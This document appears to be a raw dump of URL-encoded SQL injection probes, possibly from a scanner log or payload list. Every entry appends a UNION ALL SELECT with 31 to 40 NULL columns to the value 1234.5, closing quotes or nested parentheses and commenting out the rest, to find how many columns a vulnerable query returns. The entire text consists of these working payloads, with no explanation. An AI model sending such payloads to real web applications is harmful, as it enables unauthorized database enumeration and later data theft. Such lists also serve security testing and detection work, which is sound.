1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%289317%3D9317 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%288522%3D8522 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%283903%3D3903 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%286455%3D6455 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%289675%3D9675 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%288727%3D8727 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%281075%3D1075 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%288594%3D8594 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%288971%3D8971 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%289238%3D9238 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%284472%3D4472 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%284635%3D4635 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%284261%3D4261 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%287304%3D7304 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%286829%3D6829 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%283728%3D3728 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%284186%3D4186 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%285631%3D5631 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%281070%3D1070 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%284633%3D4633 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%284182%3D4182 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%288532%3D8532 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%281958%3D1958 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%281367%3D1367 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%287905%3D7905 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%281064%3D1064 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%287520%3D7520 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%283769%3D3769 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%287678%3D7678 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%287661%3D7661 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 